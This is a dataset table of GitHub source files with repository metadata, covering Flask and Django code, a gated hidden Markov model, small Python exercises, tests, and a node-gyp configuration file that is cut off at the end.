| blob_id (string, 40 chars) | directory_id (string, 40 chars) | path (string, 2-616 chars) | content_id (string, 40 chars) | detected_licenses (list, 0-69 items) | license_type (string, 2 classes) | repo_name (string, 5-118 chars) | snapshot_id (string, 40 chars) | revision_id (string, 40 chars) | branch_name (string, 4-63 chars) | visit_date (timestamp[us]) | revision_date (timestamp[us]) | committer_date (timestamp[us]) | github_id (int64, 2.91k-686M, nullable) | star_events_count (int64, 0-209k) | fork_events_count (int64, 0-110k) | gha_license_id (string, 23 classes) | gha_event_created_at (timestamp[us]) | gha_created_at (timestamp[us]) | gha_language (string, 213 classes) | src_encoding (string, 30 classes) | language (string, 1 class) | is_vendor (bool) | is_generated (bool) | length_bytes (int64, 2-10.3M) | extension (string, 246 classes) | content (string, 2-10.3M chars) | authors (list, 1 item) | author_id (string, 0-212 chars) |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
459e8127e4b5cb873a598644dc79c3d2708b3db1
|
a9c0a8d815b6453aca945849f3b402f75684bfcb
|
/project/api/services.py
|
95d316eb964a262ab8aa954303e31d09a23b1d26
|
[] |
no_license
|
harrywang/my-flask-tdd-docker
|
4035b666a3366cd059a3a65c68c7c9ad9b637da3
|
362c33e7caa3bf35a62cff71f3c567c5e8de1fd2
|
refs/heads/master
| 2022-04-13T23:12:04.725775
| 2020-03-21T18:14:00
| 2020-03-21T18:14:00
| 248,801,429
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 679
|
py
|
# project/api/services.py
from project import db
from project.api.models import User
def get_all_users():
return User.query.all()
def get_user_by_id(user_id):
return User.query.filter_by(id=user_id).first()
def get_user_by_email(email):
return User.query.filter_by(email=email).first()
def add_user(username, email):
user = User(username=username, email=email)
db.session.add(user)
db.session.commit()
return user
def update_user(user, username, email):
user.username = username
user.email = email
db.session.commit()
return user
def delete_user(user):
db.session.delete(user)
db.session.commit()
return user
|
[
"harryjwang@gmail.com"
] |
harryjwang@gmail.com
|
55dfdc90e02123686986cc1acf673b300872d8e1
|
b2c3feb259d8cfefe64938aa029958c50387a4ec
|
/distributed/server.py
|
c8312838d2085883135141b19fb7c53a17b91623
|
[] |
no_license
|
alexflint/tensorflow-experiments
|
0a7a5d73571bdf111ce37b4e9711df213e9d354e
|
3a95d0a869ddc9d6309bb8d6f5b06d3347748d0c
|
refs/heads/master
| 2023-07-07T01:43:06.937158
| 2018-08-12T19:17:03
| 2018-08-12T19:17:03
| 140,112,767
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 106
|
py
|
import tensorflow as tf
server = tf.train.Server.create_local_server()
print(server.target)
server.join()
|
[
"alex.flint@gmail.com"
] |
alex.flint@gmail.com
|
f9a7397aba99d47d53fd78c5c0b097fe73bfd768
|
fbb1550dc5437d672ed0137bd7711eba3290dee3
|
/students/Luyao_Xu/lesson01/activity/calculator/subtracter.py
|
328933552f5932496f2d61a3f2eb8b8bb3a1c036
|
[] |
no_license
|
JavaRod/SP_Python220B_2019
|
2cc379daf5290f366cf92dc317b9cf68e450c1b3
|
5dac60f39e3909ff05b26721d602ed20f14d6be3
|
refs/heads/master
| 2022-12-27T00:14:03.097659
| 2020-09-27T19:31:12
| 2020-09-27T19:31:12
| 272,602,608
| 1
| 0
| null | 2020-06-16T03:41:14
| 2020-06-16T03:41:13
| null |
UTF-8
|
Python
| false
| false
| 110
|
py
|
class Subtracter:
@staticmethod
def calc(operand_1, operand_2):
return operand_1 - operand_2
|
[
"xuluyao19931213@gmail.com"
] |
xuluyao19931213@gmail.com
|
f999bc0811f3d15a0bf554e32cd623a97861a497
|
f9b047b25184787af88fd151f2a6226b6b342954
|
/investmentTornadoServer/server/corpora.py
|
6d0570a7cfa8308f2e0cc773ff1adf8306bb5b7b
|
[] |
no_license
|
CallMeJiaGu/TonrnadoRecomendServer
|
4bfc3dd6d6a432321f80b12d66bb424fbc1a0911
|
54bb21191b16da27c20ce64ab14762bc777e30ca
|
refs/heads/master
| 2020-03-23T19:31:43.291995
| 2019-07-04T03:04:58
| 2019-07-04T03:04:58
| 141,984,920
| 8
| 3
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,210
|
py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2017 Wu Yuanchao <151050012@hdu.edu.cn>
import logConfig
import logging
import os
import codecs
logger = logging.getLogger()
class CorporaWithTitle():
def __init__(self, cutedfile):
self.f = cutedfile
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[0], cols[1:]
class CorporaWithoutTitle():
def __init__(self, cuted_file):
self.f = cuted_file
def __iter__(self):
with codecs.open(self.f, 'r', 'utf-8') as f:
for line in f:
cols = line.strip().lower().split(' ')
yield cols[1:]
class CorporaCut():
def __init__(self, rawfile, cuttor):
self.rawfile = rawfile
self.cuttor = cuttor
def __iter__(self):
with codecs.open(self.rawfile, 'r', 'utf-8') as f:
for i, line in enumerate(f):
cols = line.strip().split(',')
title, content = cols[0].strip().lower(), u' '.join(cols[1:]).lower()
tokens = self.cuttor.fltcut(content)
if len(tokens) > 0:
yield title.encode('utf8'), tokens
else:
logger.warn('line %d skiped' % i)
def process_rawcorpora(rawfile, target, cuttor):
cuted_corpora = CorporaCut(rawfile, cuttor)
with codecs.open(target, 'w', 'utf-8') as f:
for title, tokens in cuted_corpora:
try:
f.write(title + ' ' + u' '.join(tokens) + os.linesep)
except Exception, e:
logger.error((title, tokens, e))
def load_words(dirname):
words = set()
for fname in os.listdir(dirname):
print('load from ' + fname)
for line in codecs.open(os.path.join(dirname, fname), 'r', 'utf-8'):
for w in set(line.strip().split()):
words.add(w)
return words
if __name__ == '__main__':
from mycut import FilterCut
cuttor = FilterCut()
r = './test/raw/paper_error.txt'
t = './test/cut/test.txt'
process_rawcorpora(r, t, cuttor)
|
[
"646696382@qq.com"
] |
646696382@qq.com
|
49d3fe6b4ad2a62850cc09fd55ce4e235e09ecce
|
71d304e88e996e695451be82cfb24029b4b2b9dd
|
/ghmm.py
|
98589df3885a5307a587e450b86b7e4dd1c99f84
|
[] |
no_license
|
negar7918/GHMMs
|
7875ab232e36b05febac74c3261aca811a08d77a
|
ea75d0f3bd82c0e2e046d34debff4fd352637819
|
refs/heads/master
| 2021-07-20T13:34:37.444101
| 2020-06-09T17:53:39
| 2020-06-09T17:53:39
| 177,122,775
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,871
|
py
|
# This is the implementation of the new method in the below paper published at AIME 2019:
# "Gated Hidden Markov Models for Early Prediction of Outcome of Internet-based Cognitive Behavioral Therapy"
# This implementation is intended for sequences up to length 150 and for longer ones, one should use log probabilities.
# This implementation was used for binary states in HMM and EM needs only 10 iterations (this fact is published already)
# In case of having more states, one should implement the convergence criteria properly.
# Value -1 is used to represent a missing observation or data point; here we handle missing values without imputation.
import numpy as np
def forward(params, observations, label=None):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
alpha = np.zeros((N, S))
# base case
if observations[0] != -1:
alpha[0, :] = pi * O[:, observations[0]]
# handling missing
else:
alpha[0, :] = pi
# recursive case
for i in range(1, N):
for s2 in range(S):
for s1 in range(S):
transition = A[s1, s2]
# supervised part
if i == N - 1 and label is not None:
if label == s2:
transition = 1
else:
transition = 0
if observations[i] != -1:
alpha[i, s2] += alpha[i - 1, s1] * transition * O[s2, observations[i]]
# handling missing
else:
alpha[i, s2] += alpha[i - 1, s1] * transition
return alpha, np.sum(alpha[N - 1, :])
def backward(params, observations):
pi, A, O = params
N = len(observations)
S = pi.shape[0]
beta = np.zeros((N, S))
# base case
beta[N - 1, :] = 1
# recursive case
for i in range(N - 2, -1, -1):
for s1 in range(S):
for s2 in range(S):
if observations[i + 1] != -1:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2] * O[s2, observations[i + 1]]
# handling missings
else:
beta[i, s1] += beta[i + 1, s2] * A[s1, s2]
return beta, np.sum(pi * O[:, observations[0]] * beta[0, :])
# this is a modified version of Baum_Welch
# threshold: is intended to compare with the fractional change
# policy: contains the begin and end indexes needed to calculate the fractional change e.g [[0, 9], [-10, -1]]
# label: is the hidden state of the GHMM which needs regulation by gate mechanism
# labels for the training data are expected to be at the end of each sequence in the training data
def ghmm(training, pi, A, O, iterations, threshold, policy, label):
pi, A, O = np.copy(pi), np.copy(A), np.copy(O)
S = pi.shape[0]
begin = policy[0]
end = policy[1]
# do several steps of EM hill climbing
for it in range(iterations):
pi1 = np.zeros_like(pi)
A1 = np.zeros_like(A)
O1 = np.zeros_like(O)
for observations in training:
obs = observations[:-1]
# compute forward-backward matrices
alpha, za = forward((pi, A, O), obs, observations[-1]) # observations[-1] is the label of the sequence
beta, zb = backward((pi, A, O), obs)
# calculate sums at the desired indexes in the sequence for fractional change
sum_begin = np.sum(obs[begin[0]:begin[1]]) + obs[begin[0]:begin[1]].count(-1)
sum_end = np.sum(obs[end[0]:end[1]]) + obs[end[0]:end[1]].count(-1)
fractional_change = (abs(sum_begin - sum_end)) / sum_begin
# M-step here, calculating the frequency of starting state, transitions and (state, obs) pairs
pi1 += alpha[0, :] * beta[0, :] / za
for i in range(0, len(obs)):
# handling missings
if obs[i] != -1:
O1[:, obs[i]] += alpha[i, :] * beta[i, :] / za
for i in range(1, len(obs)):
for s1 in range(S):
for s2 in range(S):
trans = A[s1, s2]
# gate mechanism: affect the update by considering fractional_change
if s2 == label and fractional_change < threshold:
trans = 0
if obs[i] != -1:
A1[s1, s2] += alpha[i - 1, s1] * trans * O[s2, obs[i]] * beta[i, s2] / za
else:
A1[s1, s2] += alpha[i - 1, s1] * trans * beta[i, s2] / za
# normalise pi1, A1, O1
pi = pi1 / np.sum(pi1)
for s in range(S):
A[s, :] = A1[s, :] / np.sum(A1[s, :])
O[s, :] = O1[s, :] / np.sum(O1[s, :])
return pi, A, O
# quick test
a = np.array([[0.6, 0.4], [0.4, 0.6]])
p = np.array([0.7, 0.3])
o = np.array([[0.7, 0.1, 0.2, 0, 0, 0], [0, 0., 0.3, .4, .2, .1]])
label_0, label_1 = 0, 1
# the first two sequences have fractional change higher than threshold and the other two lower
data = [[4, 4, 3, 2, -1, -1, 3, 4, 1, 1, 0, label_0],
[4, 3, 3, -1, 3, -1, 3, -1, 1, 1, 1, label_0],
[5, 5, 5, 3, 4, -1, -1, -1, 4, 5, 4, label_1],
[4, 5, -1, 3, 4, 5, -1, -1, -1, 5, 3, label_1]]
start_prob, transition_prob, emission_prob = ghmm(data, p, a, o, 10,
threshold=.51, policy=[[0, 2], [-2, -1]], label=label_0)
print(start_prob)
print(transition_prob)
print(emission_prob)
print('\n')
# do perdiction for a new sequence without having label
sequence = [5, 4, -1, 4, 4, 5, -1, -1, -1, 5, 4]
fwd, s = forward((start_prob, transition_prob, emission_prob), sequence)
prob = fwd[len(sequence) - 1, 1] / s
print("prediction probability: {}".format(prob))
print("predicted label: {}".format(1 if prob > .5 else 0))
|
[
"negars@kth.se"
] |
negars@kth.se
|
d7ce13d83dd278c415907caea2967729f60ed941
|
78a8c8a60b9ebb6c5e01528253971f8464acdc27
|
/python/problem79.py
|
be165c1f7339f7177c38ab3d2d5c3cc45a096b0d
|
[] |
no_license
|
hakver29/project_euler
|
f1b2d19f0bf2c6b842256f961845424cd2dc696f
|
ab356a32d706759531cad7a1a6586534ff92c142
|
refs/heads/master
| 2021-06-03T13:39:22.758018
| 2020-12-01T23:42:35
| 2020-12-01T23:42:35
| 70,273,535
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 559
|
py
|
import pandas as pd
import os
path = './p079_keylog.txt'
data = pd.read_csv(path, header=None)
print(data)
# First letter: [1,3,6,7]
# Only 7 is always first: 7
# Second letter: [1,2,3,6]
# 3 before 1
# 3 before 6
# 3 before 2
# Second letter: 3
# Third letter: [0, 1,2,6,7,8,9]
# 1 before 9 2 8 6 0
# Third letter: 1
# Fourth letter: [0,2,6,8,9]
# 6 before 0,2,8,9
# Fourth letter: 6
# Fifth letter: [0,2,8,9]
# 8 before 0
# 9 before 0
# 8 before 9
# 2 before 9
# 2 before 8
# Fifth letter: 2
# Sixth letter: [0,8,9]
# Remaining: 890
# Answer: 73162890
|
[
"haakongv@stud.ntnu.no"
] |
haakongv@stud.ntnu.no
|
5edb0c8e55ee71407031f5baea3676bd34bf5368
|
28ae42f6a83fd7c56b2bf51e59250a31e68917ca
|
/tracpro/polls/migrations/0015_issue_region.py
|
ff1c2937af89c2c8ce646673002fd58356fd1f04
|
[
"BSD-3-Clause"
] |
permissive
|
rapidpro/tracpro
|
0c68443d208cb60cbb3b2077977786f7e81ce742
|
a68a782a7ff9bb0ccee85368132d8847c280fea3
|
refs/heads/develop
| 2021-01-19T10:29:48.381533
| 2018-03-13T12:17:11
| 2018-03-13T12:17:11
| 29,589,268
| 5
| 10
|
BSD-3-Clause
| 2018-02-23T14:43:12
| 2015-01-21T12:51:24
|
Python
|
UTF-8
|
Python
| false
| false
| 575
|
py
|
# -*- coding: utf-8 -*-
from __future__ import unicode_literals
from django.db import models, migrations
class Migration(migrations.Migration):
dependencies = [
('groups', '0004_auto_20150123_0909'),
('polls', '0014_remove_response_is_complete'),
]
operations = [
migrations.AddField(
model_name='issue',
name='region',
field=models.ForeignKey(related_name='issues_2', to='groups.Region', help_text='Region where poll was conducted', null=True),
preserve_default=True,
),
]
|
[
"rowanseymour@gmail.com"
] |
rowanseymour@gmail.com
|
adec15e7f10d62c6d1a6c1bca83ce174883b2551
|
69f47a6e77fc2a1363fc8713ed83d36209e7cf32
|
/deframed/default.py
|
997b289bd34920ff3704dc3d241fa7fbc6f6c50e
|
[] |
no_license
|
smurfix/deframed
|
f1c4611c597809b53a138b70665430ed080a989d
|
9c1d4db2991cef55725ac6ecae44af60a96ff4f2
|
refs/heads/master
| 2022-07-20T14:08:35.938667
| 2022-07-14T07:05:43
| 2022-07-14T07:05:43
| 259,882,446
| 24
| 1
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,184
|
py
|
"""
This module contains the default values for configuring DeFramed.
"""
from .util import attrdict
__all__ = ["CFG"]
CFG = attrdict(
logging=attrdict( # a magic incantation
version=1,
loggers=attrdict(
#"asyncari": {"level":"INFO"},
),
root=attrdict(
handlers= ["stderr",],
level="INFO",
),
handlers=attrdict(
logfile={
"class":"logging.FileHandler",
"filename":"/var/log/deframed.log",
"level":"INFO",
"formatter":"std",
},
stderr={
"class":"logging.StreamHandler",
"level":"INFO",
"formatter":"std",
"stream":"ext://sys.stderr",
},
),
formatters=attrdict(
std={
"class":"deframed.util.TimeOnlyFormatter",
"format":'%(asctime)s %(levelname)s:%(name)s:%(message)s',
},
),
disable_existing_loggers=False,
),
server=attrdict( # used to setup the hypercorn toy server
host="127.0.0.1",
port=8080,
prio=0,
name="test me",
use_reloader=False,
ca_certs=None,
certfile=None,
keyfile=None,
),
mainpage="templates/layout.mustache",
debug=False,
data=attrdict( # passed to main template
title="Test page. Do not test!",
loc=attrdict(
#msgpack="https://github.com/ygoe/msgpack.js/raw/master/msgpack.min.js",
#mustache="https://github.com/janl/mustache.js/raw/master/mustache.min.js",
msgpack="https://unpkg.com/@msgpack/msgpack",
mustache="/static/ext/mustache.min.js",
bootstrap_css="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/css/bootstrap.min.css",
bootstrap_js="https://stackpath.bootstrapcdn.com/bootstrap/4.4.1/js/bootstrap.min.js",
poppler="https://cdn.jsdelivr.net/npm/popper.js@1.16.0/dist/umd/popper.min.js",
jquery="https://code.jquery.com/jquery-3.4.1.slim.min.js",
),
static="static", # path
),
)
|
[
"matthias@urlichs.de"
] |
matthias@urlichs.de
|
7d75a5e69d0aeff702d6fe53686e32f47cd01b4e
|
f1614f3531701a29a33d90c31ab9dd6211c60c6b
|
/test/menu_sun_integration/handlers/test_status_synchronizer_service.py
|
207c451856241312424ce76fdbb72a3f98062b7d
|
[] |
no_license
|
pfpacheco/menu-sun-api
|
8a1e11543b65db91d606b2f3098847e3cc5f2092
|
9bf2885f219b8f75d39e26fd61bebcaddcd2528b
|
refs/heads/master
| 2022-12-29T13:59:11.644409
| 2020-10-16T03:41:54
| 2020-10-16T03:41:54
| 304,511,679
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 3,110
|
py
|
import json
import os
import responses
import pytest
from menu_sun_api.domain.model.customer.customer import Customer
from menu_sun_api.domain.model.order.order import OrderStatusType
from menu_sun_api.domain.model.order.order_repository import OrderRepository
from menu_sun_api.domain.model.seller.seller import IntegrationType
from menu_sun_integration.application.services.order_integration_service import OrderIntegrationService
from promax.application.status_synchronizer_service import StatusSynchronizerService
from test.menu_sun_api.db.order_factory import OrderFactory, OrderStatusFactory
from test.menu_sun_api.db.seller_factory import SellerFactory
from test.menu_sun_api.integration_test import IntegrationTest
here = os.path.dirname(os.path.realpath(__file__))
def bind_seller(integration_type):
return SellerFactory.create(seller_code='0810204', integration_type=integration_type)
class TestStatusNotifierService(IntegrationTest):
@pytest.fixture
def active_responses(self):
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/authenticate_user_response.json'))
response = json.load(json_file)
responses.add(responses.POST, 'https://{}/ambev/security/ldap/authenticateUser'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
return responses
@responses.activate
def test_fetch_order_status_promax(self, session, active_responses):
seller = bind_seller(IntegrationType.PROMAX)
session.commit()
customer = Customer(document="17252508000180", seller_id=seller.id)
statuses = [OrderStatusFactory(status=OrderStatusType.NEW),
OrderStatusFactory(status=OrderStatusType.APPROVED)]
order = OrderFactory.create(seller_id=seller.id, order_id='M2100008658',
customer=customer, statuses=statuses)
session.commit()
json_file = open(
os.path.join(
here,
'../../menu_sun_integration/infrastructure/ambev/promax_response/orders_history_response.json'))
response = json.load(json_file)
active_responses.add(responses.POST,
'https://{}/ambev/genericRestEndpoint'.format(os.getenv("PROMAX_IP")),
json=response, status=200)
order_repository = OrderRepository(session=session)
integration_service = OrderIntegrationService(session=session)
status_notification = StatusSynchronizerService(order_repository=order_repository,
integration_service=integration_service)
status_notification.sync_all_pending_orders(
seller_id=seller.id, seller_code=seller.seller_code, integration_type=seller.integration_type)
session.commit()
order = order_repository.get_order(
seller_id=seller.id, order_id=order.order_id)
assert (order.status.status == OrderStatusType.CANCELED)
|
[
"pfpacheco@gmail.com"
] |
pfpacheco@gmail.com
|
dedc1e2d4474ac95a338056cb6ee689645ed4e0c
|
3607629e732c37f40231fe4c83e73ac087ed3fcf
|
/poc-todo/POC/APP/Task/migrations/0004_remove_usertasks_first_name.py
|
08ca53373c7ef5acfe15379664dd64b1b080bddd
|
[] |
no_license
|
gout-tech/apis_cusat_connect
|
3d71f73a620b7fa489671f45cbce7cc7b6972f80
|
fd7114480592e81ead6e2efe932504629c2ff696
|
refs/heads/master
| 2022-05-29T14:10:10.326086
| 2020-02-25T04:18:38
| 2020-02-25T04:18:38
| 242,907,961
| 0
| 0
| null | 2022-04-22T23:06:17
| 2020-02-25T04:17:32
|
Python
|
UTF-8
|
Python
| false
| false
| 334
|
py
|
# Generated by Django 2.2.1 on 2019-08-12 13:16
from django.db import migrations
class Migration(migrations.Migration):
dependencies = [
('Task', '0003_usertasks_first_name'),
]
operations = [
migrations.RemoveField(
model_name='usertasks',
name='first_name',
),
]
|
[
"goutham.hashrot@gmail.com"
] |
goutham.hashrot@gmail.com
|
6d5e991fc2b55c73e9b32da5c9d0db6a146186b2
|
a22054032f23d84f34741532aaca5fe46e23a552
|
/run_app_dev.py
|
6fae0d484a2796685d1401726f30707b1548e9fc
|
[] |
no_license
|
BearChao/transfer
|
622003bfb0b2b7c8da6287a65764c69ad81f3d9c
|
4159a596d0f5c728f6ce27568beb21c2ba321846
|
refs/heads/master
| 2021-05-23T06:08:01.183541
| 2018-05-28T14:39:30
| 2018-05-28T14:39:30
| 94,799,123
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 209
|
py
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
import os
from app import create_app
app = create_app(os.getenv('FLASK_CONFIG') or 'default')
if __name__ == '__main__':
app.run(host='0.0.0.0',debug=True)
|
[
"zynick@foxmail.com"
] |
zynick@foxmail.com
|
811d4c6beed89125664d5495f5675efc4f51e2f2
|
3d18dbe77b052754e2a7a9bbaee9650a9fb410e2
|
/test/11-ignore-design-docs.py
|
ea7165e3f5b58d5a27a8d4f9da83c47858fcd920
|
[
"Apache-2.0"
] |
permissive
|
apache/couchdb-mango
|
765ebceec2912acb9696fadf9ec8f3d244d604c6
|
312e2c45535913c190cdef51f6ea65066ccd89dc
|
refs/heads/master
| 2023-07-02T18:36:31.552696
| 2017-02-07T16:40:09
| 2017-03-31T17:25:17
| 30,287,956
| 39
| 23
|
Apache-2.0
| 2023-01-18T14:24:00
| 2015-02-04T08:00:05
|
Erlang
|
UTF-8
|
Python
| false
| false
| 1,106
|
py
|
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
import mango
import unittest
DOCS = [
{
"_id": "_design/my-design-doc",
},
{
"_id": "54af50626de419f5109c962f",
"user_id": 0,
"age": 10,
"name": "Jimi"
},
{
"_id": "54af50622071121b25402dc3",
"user_id": 1,
"age": 11,
"name": "Eddie"
}
]
class IgnoreDesignDocsForAllDocsIndexTests(mango.DbPerClass):
def test_should_not_return_design_docs(self):
self.db.save_docs(DOCS)
docs = self.db.find({"_id": {"$gte": None}})
assert len(docs) == 2
|
[
"garren.smith@gmail.com"
] |
garren.smith@gmail.com
|
9152ac03f49d6c145510fb642b234cac13c0b135
|
23e0f2433ae89295766a24d8d87626d18af6e84c
|
/problems/abc179_a.py
|
78c1867f75ae21403e67d3de6f63c06edac7d487
|
[] |
no_license
|
chokoryu/atcoder
|
0d7ec486177e45abee847acde38d31d35c61df42
|
e0c0920a7a4d8a90fd6fb3cab7ab1e97a95b9084
|
refs/heads/master
| 2023-02-06T12:06:09.562394
| 2020-12-29T02:42:54
| 2020-12-29T02:42:54
| 283,260,970
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 460
|
py
|
from fractions import gcd
from collections import Counter, deque, defaultdict
from heapq import heappush, heappop, heappushpop, heapify, heapreplace, merge
from bisect import bisect_left, bisect_right, bisect, insort_left, insort_right, insort
from itertools import accumulate, product, permutations, combinations
def main():
S = input()
if S[-1] == 's':
print(S + 'es')
else:
print(S + 's')
if __name__ == '__main__':
main()
|
[
"chokoryu@gmail.com"
] |
chokoryu@gmail.com
|
6b10d9a5295db113b96722c8b92c968c83079333
|
ef821468b081ef2a0b81bf08596a2c81e1c1ef1a
|
/Python OOP/Decorators-Exercise/Cache.py
|
3630fbd6868ddb28d50316c5fea622d51b440ae5
|
[] |
no_license
|
Ivaylo-Atanasov93/The-Learning-Process
|
71db22cd79f6d961b9852f140f4285ef7820dd80
|
354844e2c686335345f6a54b3af86b78541ed3f3
|
refs/heads/master
| 2023-03-30T20:59:34.304207
| 2021-03-29T15:23:05
| 2021-03-29T15:23:05
| 294,181,544
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 346
|
py
|
def cache(func):
def wrapper(n):
result = func(n)
wrapper.log[n] = result
return result
wrapper.log = {}
return wrapper
@cache
def fibonacci(n):
if n < 2:
return n
else:
return fibonacci(n - 1) + fibonacci(n - 2)
fibonacci(3)
print(fibonacci.log)
fibonacci(4)
print(fibonacci.log)
|
[
"ivailo.atanasov93@gmail.com"
] |
ivailo.atanasov93@gmail.com
|
e6f8f51a840280d413cfe95488d13ed729fe6b2e
|
3c2bb35d04a2dd44e16366c6e52eb74ecf8ba87b
|
/linearsearch.py
|
27f9b69282c90729ee8439a664c1be6609b2dad0
|
[] |
no_license
|
Brijesh-Pandey/Python-Programs-For-Noobs
|
7c871ebf01ce5f9e4cfa53b100b8f1b569f72a5d
|
1d7187986a26d3f7ebcf3699017ab242dd16b482
|
refs/heads/main
| 2023-08-18T01:46:22.533629
| 2021-10-09T20:06:30
| 2021-10-21T01:37:49
| 301,089,699
| 6
| 11
| null | 2021-05-18T09:27:14
| 2020-10-04T09:32:23
|
Python
|
UTF-8
|
Python
| false
| false
| 247
|
py
|
z=int(input("Enter element to be searched "))
li=[int(x) for x in input().split()]
for i in range(len(li)):
if li[i]==z:
flag=1
break
else:
flag=0
if flag==1:
print("Found at position ",+i+1 )
else:
print("Not found")
input()
|
[
"noreply@github.com"
] |
Brijesh-Pandey.noreply@github.com
|
f37490ad07011a1845fa6775b2a3edffd1ff59fc
|
5141c8756e790847866c19d63744bd7c8033a51c
|
/docs/libs/reveal.js/3.7.0/plugin/multiplex/node_modules/bufferutil/build/config.gypi
|
508a69af90f898303ce883dba2be1aa581eebd58
|
[
"MIT"
] |
permissive
|
al341801/EI1036_42
|
db6fceb4fdb9272b28f34c16ee520ce072c5810b
|
d1d2c1b86a134fc4c45ba4146002589f7bee27f3
|
refs/heads/master
| 2020-09-15T13:02:09.056697
| 2019-11-22T15:05:53
| 2019-11-22T15:05:53
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 5,286
|
gypi
|
# Do not edit. File was generated by node-gyp's "configure" step
{
"target_defaults": {
"cflags": [],
"default_configuration": "Release",
"defines": [],
"include_dirs": [],
"libraries": []
},
"variables": {
"asan": 0,
"coverage": "false",
"debug_devtools": "node",
"debug_http2": "false",
"debug_nghttp2": "false",
"force_dynamic_crt": 0,
"host_arch": "x64",
"icu_data_file": "icudt60l.dat",
"icu_data_in": "../../deps/icu-small/source/data/in/icudt60l.dat",
"icu_endianness": "l",
"icu_gyp_path": "tools/icu/icu-generic.gyp",
"icu_locales": "en,root",
"icu_path": "deps/icu-small",
"icu_small": "true",
"icu_ver_major": "60",
"llvm_version": 0,
"node_byteorder": "little",
"node_enable_d8": "false",
"node_enable_v8_vtunejit": "false",
"node_install_npm": "true",
"node_module_version": 59,
"node_no_browser_globals": "false",
"node_prefix": "/",
"node_release_urlbase": "https://nodejs.org/download/release/",
"node_shared": "false",
"node_shared_cares": "false",
"node_shared_http_parser": "false",
"node_shared_libuv": "false",
"node_shared_nghttp2": "false",
"node_shared_openssl": "false",
"node_shared_zlib": "false",
"node_tag": "",
"node_use_bundled_v8": "true",
"node_use_dtrace": "true",
"node_use_etw": "false",
"node_use_lttng": "false",
"node_use_openssl": "true",
"node_use_perfctr": "false",
"node_use_v8_platform": "true",
"node_without_node_options": "false",
"openssl_fips": "",
"openssl_no_asm": 0,
"shlib_suffix": "59.dylib",
"target_arch": "x64",
"uv_parent_path": "/deps/uv/",
"uv_use_dtrace": "true",
"v8_enable_gdbjit": 0,
"v8_enable_i18n_support": 1,
"v8_enable_inspector": 1,
"v8_no_strict_aliasing": 1,
"v8_optimized_debug": 0,
"v8_promise_internal_field_count": 1,
"v8_random_seed": 0,
"v8_trace_maps": 0,
"v8_use_snapshot": "true",
"want_separate_host_toolset": 0,
"xcode_version": "7.0",
"nodedir": "/Users/dllido/.node-gyp/9.3.0",
"standalone_static_library": 1,
"dry_run": "",
"legacy_bundling": "",
"save_dev": "",
"browser": "",
"commit_hooks": "true",
"only": "",
"viewer": "man",
"also": "",
"rollback": "true",
"sign_git_commit": "",
"audit": "true",
"usage": "",
"globalignorefile": "/usr/local/etc/npmignore",
"init_author_url": "",
"maxsockets": "50",
"shell": "/bin/bash",
"metrics_registry": "https://registry.npmjs.org/",
"parseable": "",
"shrinkwrap": "true",
"init_license": "ISC",
"timing": "",
"if_present": "",
"cache_max": "Infinity",
"init_author_email": "",
"sign_git_tag": "",
"cert": "",
"git_tag_version": "true",
"local_address": "",
"long": "",
"preid": "",
"fetch_retries": "2",
"noproxy": "",
"registry": "https://registry.npmjs.org/",
"key": "",
"message": "%s",
"versions": "",
"globalconfig": "/usr/local/etc/npmrc",
"always_auth": "",
"logs_max": "10",
"prefer_online": "",
"cache_lock_retries": "10",
"global_style": "",
"update_notifier": "true",
"audit_level": "low",
"heading": "npm",
"fetch_retry_mintimeout": "10000",
"offline": "",
"read_only": "",
"searchlimit": "20",
"access": "",
"json": "",
"allow_same_version": "",
"description": "true",
"engine_strict": "",
"https_proxy": "",
"init_module": "/Users/dllido/.npm-init.js",
"userconfig": "/Users/dllido/.npmrc",
"cidr": "",
"node_version": "9.3.0",
"user": "",
"auth_type": "legacy",
"editor": "vi",
"ignore_prepublish": "",
"save": "true",
"script_shell": "",
"tag": "latest",
"global": "",
"progress": "true",
"ham_it_up": "",
"optional": "true",
"searchstaleness": "900",
"bin_links": "true",
"force": "",
"save_prod": "",
"searchopts": "",
"depth": "Infinity",
"node_gyp": "/usr/local/lib/node_modules/npm/node_modules/node-gyp/bin/node-gyp.js",
"rebuild_bundle": "true",
"sso_poll_frequency": "500",
"unicode": "true",
"fetch_retry_maxtimeout": "60000",
"ca": "",
"save_prefix": "^",
"scripts_prepend_node_path": "warn-only",
"sso_type": "oauth",
"strict_ssl": "true",
"tag_version_prefix": "v",
"dev": "",
"fetch_retry_factor": "10",
"group": "20",
"save_exact": "",
"cache_lock_stale": "60000",
"prefer_offline": "",
"version": "",
"cache_min": "10",
"otp": "",
"cache": "/Users/dllido/.npm",
"searchexclude": "",
"color": "true",
"package_lock": "true",
"package_lock_only": "",
"save_optional": "",
"user_agent": "npm/6.7.0 node/v9.3.0 darwin x64",
"ignore_scripts": "",
